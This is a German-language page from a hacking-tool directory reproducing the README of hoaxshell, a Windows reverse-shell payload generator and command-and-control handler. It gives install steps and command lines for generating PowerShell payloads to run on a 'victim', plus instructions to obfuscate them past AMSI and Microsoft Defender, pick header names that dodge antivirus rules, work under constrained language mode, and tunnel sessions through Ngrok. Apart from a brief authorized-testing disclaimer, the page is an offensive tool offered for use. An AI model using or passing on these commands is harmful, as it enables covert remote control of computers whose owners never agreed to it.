Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
hoaxshell — Ein Windows-Reverse-Shell-Payload-Generator und -Handler, der das HTTP(s)-Protokoll missbraucht, um eine beacon-ähnliche Reverse-Shell herzustellen. | Kitploit
Tools/GitHubGitHub/t3l3machus/hoaxshell
Privilege EscalationPayload-GenerierungExploitationReverse EngineeringPost-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubt3l3machus/hoaxshell

hoaxshell

Ein Windows-Reverse-Shell-Payload-Generator und -Handler, der das HTTP(s)-Protokoll missbraucht, um eine beacon-ähnliche Reverse-Shell herzustellen.

Repository anzeigen
3.5k524128vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

hoaxshell

Python License

⚡ Die neueste Version dieses Projekts ist der HoaxShell Standalone Listener, der mit aktualisierten Payload-Vorlagen kommt. Du kannst es auch direkt von https://revshells.com verwenden (stelle sicher, dass du hoaxshell als Listener auswählst).

⚠️ Seit dem 18.10.2022 wird hoaxshell von AMSI erkannt (Malware-Enzyklopädie). Du musst den generierten Payload obfuscieren, um ihn verwenden zu können. Schau dir dieses Video an, wie man manuell obfusciert und MS Defender umgeht:

  • Beispiel mit Hoaxshell -> youtube.com/watch?v=iElVfagdCD4
  • Beispiel mit gewöhnlichen PowerShell Revshell-Vorlagen -> youtube.com/watch?v=3HddKylkRzM

Zweck

hoaxshell ist ein Generator und Handler für Windows Reverse Shell Payloads, der das http(s)-Protokoll missbraucht, um eine beacon-ähnliche Reverse Shell einzurichten, basierend auf dem folgenden Konzept:

image

Dieses C2-Konzept (das mit anderen Protokollen als http oder vorinstallierten Exes implementiert werden könnte) kann verwendet werden, um Sitzungen einzurichten, die die Illusion einer Shell fördern, aber weit von einer echten pty entfernt sind.

HoaxShell schnitt gut gegen AV-Software ab (siehe Tabelle der AV-Bypass-PoCs für weitere Informationen). Obwohl es jetzt allgemein erkannt wird, ist es einfach, die generierten Payload(s) mit automatisierten Tools oder manuell zu obfuscieren.

Haftungsausschluss: Rein für Test- und Bildungszwecke erstellt. Führe die von diesem Tool generierten Payloads NICHT gegen Hosts aus, für die du keine ausdrückliche Erlaubnis und Autorisierung zum Testen hast. Du bist für alle Probleme verantwortlich, die durch die Nutzung dieses Tools entstehen können.

Videopräsentationen

[2022-10-11] Aktuell & großartig, erstellt von John Hammond -> youtube.com/watch?v=fgSARG82TJY
[2022-07-15] Original Release Demo, erstellt von mir -> youtube.com/watch?v=SEufgD5UxdU

Screenshots

image

Weitere Screenshots findest du hier.

Installation

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

Verwendung

Wichtig: Um einer Erkennung zu entgehen, generiert hoaxshell automatisch zufällige Werte für die Sitzungs-ID, URL-Pfade und den Namen eines benutzerdefinierten HTTP-Headers, der im Prozess verwendet wird, jedes Mal, wenn das Skript gestartet wird. Der generierte Payload funktioniert nur für die Instanz, für die er generiert wurde. Verwende die Option -g, um dieses Verhalten zu umgehen und eine aktive Sitzung wiederherzustellen oder einen früher generierten Payload mit einer neuen Instanz von hoaxshell wiederzuverwenden.

Einfache Shell-Sitzung über http

Wenn du hoaxshell ausführst, wird es seinen eigenen PowerShell-Payload generieren, den du kopieren und auf dem Opfer injizieren kannst. Standardmäßig ist der Payload zur Bequemlichkeit base64-kodiert. Wenn du den rohen Payload benötigst, führe den Prompt-Befehl "rawpayload" aus oder starte hoaxshell mit dem Argument -r. Nachdem der Payload auf dem Opfer ausgeführt wurde, kannst du PowerShell-Befehle dagegen ausführen.

Payload, der Invoke-Expression verwendet (Standard)

sudo python3 hoaxshell.py -s <your_ip>

Payload, der Befehle in eine Datei schreibt und ausführt

Verwende -x, um einen .ps1-Dateinamen (absoluten Pfad) anzugeben, der auf dem Opfer-Rechner erstellt werden soll. Du solltest den rohen Payload vor der Ausführung überprüfen, um sicherzustellen, dass der von dir angegebene Pfad gültig ist.

sudo python3 hoaxshell.py -s <your_ip> -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"

Empfohlene Nutzung zur Vermeidung von Erkennung (über http)

Hoaxshell verwendet einen HTTP-Header, um Shell-Sitzungsinformationen zu übertragen. Standardmäßig wird dem Header ein zufälliger Name gegeben, der von regex-basierten AV-Regeln erkannt werden kann. Verwende -H, um einen Standard- oder benutzerdefinierten HTTP-Header-Namen anzugeben, um Erkennung zu vermeiden.

sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization"
sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization" -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"

Verschlüsselte Shell-Sitzung (https + selbstsigniertes Zertifikat)

Dieser spezielle Payload ist eine Art Alarmglocke, da er mit einem zusätzlichen Codeblock beginnt, der PowerShell anweist, SSL-Zertifikatsprüfungen zu überspringen, was ihn verdächtig und leicht erkennbar macht, sowie deutlich länger in der Länge. Nicht empfohlen.

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

Verschlüsselte Shell-Sitzung mit einem vertrauenswürdigen Zertifikat

Wenn du eine Domain besitzt, verwende diese Option, um einen kürzeren und weniger erkennbaren https-Payload zu generieren, indem du deinen DN mit -s zusammen mit einem vertrauenswürdigen Zertifikat (-c cert.pem -k privkey.pem) angibst.

sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>

Grab-Sitzungsmodus

Falls du dein Terminal versehentlich schließt, einen Stromausfall oder ähnliches hast, kannst du hoaxshell im Grab-Sitzungsmodus starten; es wird versuchen, eine Sitzung wiederherzustellen, vorausgesetzt, der Payload läuft noch auf dem Opfer-Rechner.

sudo python3 hoaxshell.py -s <your_ip> -g

Wichtig: Stelle sicher, dass du hoaxshell mit denselben Einstellungen startest wie die Sitzung, die du wiederherstellen möchtest (http/https, Port usw.).

Unterstützung des Constraint Language Mode

Verwende eine der Payload-Varianten mit der Option -cm (--constraint-mode), um einen Payload zu generieren, der funktioniert, selbst wenn das Opfer so konfiguriert ist, dass es PowerShell im Constraint Language Mode ausführt. Durch die Verwendung dieser Option opferst du ein wenig die Genauigkeit der stdout-Dekodierung deiner Reverse Shell.

sudo python3 hoaxshell.py -s <your_ip> -cm

image

Shell-Sitzung über https mit Tunnel-Tools (Ngrok / LocalTunnel)

Nutze Tunnel-Programme Ngrok oder LocalTunnel, um Sitzungen durch sichere Tunnel zu erhalten und Probleme wie das Fehlen einer statischen IP-Adresse oder das Verbot von Port-Forwarding durch deinen ISP zu umgehen.

Verwende -ng oder --ngrok für Ngrok-Server

sudo python3 hoaxshell.py -ng

Verwende -lt oder --localtunnel für LocalTunnel-Server

sudo python3 hoaxshell.py -lt
Tool herunterladen